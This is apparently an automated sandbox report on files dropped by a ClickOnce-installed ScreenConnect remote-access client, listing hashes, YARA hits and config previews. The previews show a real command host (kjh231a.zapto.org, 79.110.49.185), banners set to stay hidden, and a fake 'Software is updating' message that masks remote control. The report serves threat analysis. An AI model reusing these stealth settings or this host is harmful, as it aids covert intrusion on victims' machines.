                                                                                                                                                                                                                                                        SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                        SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                        SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                        • Filename: xrWUzly94Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: EPCo9k8NIn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: X5zNv1VJia.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: AmedVA2n92.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: 3ckUhKW8W6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                        Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                        MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                        SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                        SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                        SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                        Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                        MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                        SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                        SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                        SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):548352
                                                                                                                                                                                                                                                        Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                        MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                        SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                        SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                        SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                        Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                        MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                        SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                        SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                        SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):600864
                                                                                                                                                                                                                                                        Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                        MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                        SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                        SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                        Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                        MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                        SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                        SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                        SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):359
                                                                                                                                                                                                                                                        Entropy (8bit):4.83753806903797
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10+HwercYn:rHy2DLI4MWoHO8L9cAgRMZRCl1FHcY
                                                                                                                                                                                                                                                        MD5:17702A9E63BED7438F3217D594D6E35C
                                                                                                                                                                                                                                                        SHA1:7C556F344A57D5933A528F8B8CFD0363F15AE0E3
                                                                                                                                                                                                                                                        SHA-256:8BFD7D9E0BAC6BDE538DFBE31E8919933547F30248E747C5B38EB84472DF3701
                                                                                                                                                                                                                                                        SHA-512:642BB2D85ECB653DA779AFFAA4285612BC7EB08383967DB16D9F9CA709F6A46280E6E6C7605E850E5AEC28043828826CA6948982591C310374119785784B303B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.?....=Software is updating... Please do not turn off your computer!..
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):256
                                                                                                                                                                                                                                                        Entropy (8bit):4.878405169379307
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJkw:rHy2DLI4MWoj12eKfKCKB
                                                                                                                                                                                                                                                        MD5:B5450F2285052D7D31714E92BAE6143E
                                                                                                                                                                                                                                                        SHA1:0904C6FE250983A97D5210DFEACCB1C1CF34D643
                                                                                                                                                                                                                                                        SHA-256:23054E289EB585EB0314C44FD753ED3803C012E06B954926F3FC7167A370F928
                                                                                                                                                                                                                                                        SHA-512:79DA469F0C4ACB50D9B399086ED171C69E00C4CF5CB8A2089FD49F5864C1BF46E8434FB23CD210ABB83B88FF06E435A92C8E926B435BFB03EA207D5D7069723E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):50133
                                                                                                                                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):26722
                                                                                                                                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2089
                                                                                                                                                                                                                                                        Entropy (8bit):4.688974504275539
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHK:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHY
                                                                                                                                                                                                                                                        MD5:6E88FAD97F4CFC0339D8D71F55326EDF
                                                                                                                                                                                                                                                        SHA1:7FE09E6D87B7CA210C8D7AFA9D69380528A6D4F2
                                                                                                                                                                                                                                                        SHA-256:F09E170444003576AD24985C8B4873E7CBDC18863A4943A1FDEB0E3249812806
                                                                                                                                                                                                                                                        SHA-512:023175F24C652E73946A01DB84579BAF00D4447AFA01CD2EA09820964DCA10D9C24C7DD7F37109A836996477B4C9804B75830C95A790B5598564395272F98A15
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):562
                                                                                                                                                                                                                                                        Entropy (8bit):5.07472095669198
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDe05/vXbAa3xT:2dL9hK6E46YPoXdRvH
                                                                                                                                                                                                                                                        MD5:2C3CAC6AD93194810D9F78DF367938C0
                                                                                                                                                                                                                                                        SHA1:5BEB69CA0EBA75C96F5400626128E3F4884590E2
                                                                                                                                                                                                                                                        SHA-256:B954BEDC5C99432A2B99AB5A8627B01671575E77035F7A4589F6647632EA4751
                                                                                                                                                                                                                                                        SHA-512:7BD7E4D8B106D2A5269EFB7F4B1446FF308BFA2C417974EA626F608E3DECE7F0A57AFA0384D126D269DEEC70198953DA8AE3BFBE66951CAC35EEF7561130D7A2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a56</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                        Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                        MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                        SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                        SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                        SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1373
                                                                                                                                                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
